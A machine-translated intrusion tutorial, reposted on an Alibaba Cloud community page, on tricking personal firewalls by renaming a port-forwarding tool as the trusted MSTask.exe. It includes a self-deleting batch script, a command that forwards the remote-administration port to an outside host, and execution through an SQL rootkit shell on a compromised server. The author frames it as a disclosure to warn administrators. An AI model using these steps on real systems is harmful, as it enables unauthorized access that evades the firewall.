There has always been a dream: if you can find some loopholes or bugs what a good ah! So all day in the computer blindly blind research, study what? Research on how to break through the firewall (I mean the firewall is a soft body of personal firewalls, hardware I also have no conditions.) Hey, you don't say, really did not white research, but also really to me found that most of the common firewall. This bug allows us to deceive the firewall to achieve the purpose of outbound, what is the specific situation? Take a look at the explanations below!
First of all, I would like to introduce the features of Windows system, when a program is running, it can not be deleted, but it can be renamed! When the system's protected program is deleted or damaged or renamed, the system will timely call backup files to restore! I'll talk about firewalls, and we all know that many firewall "application rules" generally default to the IE browser (iexplore.exe), Outlook Express (Msimn.exe), Lsass.exe, Spoolsv.exe, MSTask.exe, Winlogon.exe, Services.exe, Svchost.exe Pass, and most firewalls think that as long as the path and file name in the rule is the same as the pass! To determine whether or not to pass this test, but it does not take into account if the other file is replaced? --the equivalent of the ancient costume film in the easy to tolerate surgery, easy to recognize after it! This gives us the opportunity, we can use this bug to deceive firewalls to achieve the purpose of outbound!
Small knowledge: In fact, most Trojans use the DLL inserted threading technology is the use of this principle, they first covert to open a certification release process (such as Iexplore.exe process), and then the DLL into the thread, and then visit the outside can easily break through the limits of the firewall- Because the firewall does not intercept the certified release of the program.
The principle is finished, let's talk about how to use this bug now! Here I use the virtual machine to do the experiment, manufacture the following conditions:
In order to be more realistic, I installed the server "Skynet Firewall", Radmin (but because the firewall specified the Access IP address, so no way to normal connection!) ), MSSQL SERVER, Serv-u. First, we use the usual method for port forwarding, to see what the firewall response!
The first step is to enable the FPort in Angelshell Ver 1.0 (the server that is used for port forwarding, which can almost forward any port), and then monitor it locally with fportclient (for port forwarding clients)!
The second step, directly in the Cmdshell run "E:\www\fport.exe 4899 192.168.1.1 7788", when we see the virtual machine in the "Skynet" to FPort immediately intercepted.
See it! Because the FPort is not certified to release, the firewall immediately to intercept! OK, now we implement deception plan, see how I break the firewall! Or do the first step, and then create a new batch with the following contents:
ren MSTask.exe MSTask1.exe
ren fport.exe MSTask.exe
MSTask.exe 4899 192.168.1.1 7788
Del%0
Named Go.bat, and then use Sqlrootkit "Fport.exe" and Go.bat copy to the target machine c:\winnt\system32\ (That is, the directory where Mstask is located) executes Go.bat in Sqlrootkit (note that you need administrator privileges if you want to change the name of MSTask.exe).
When Fportclient appears, "You have received a connection to a remote computer!" ", connect the local 4899 port with the Radmin client.
We have successfully breached the limit (because the firewall does not limit local connection 4899 port, we use FPort forward its port, login equals local connection, so we can successfully connect), so we could not escape the firewall FPort became a "thread" The port forwarding tool for the technology!
According to my experiment, the domestic firewall almost without exception "own" this bug! Although this bug does not bring any big harm, but always gives the intruder a black our opportunity!
WTF boss said alone Lele not as many lele, so I still announced out, one can let our domestic firewall has improved, the second is to the network management to mention a wake up! Because of the limited skills of the younger brother, there will inevitably be mistakes, and I welcome you to criticize.
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.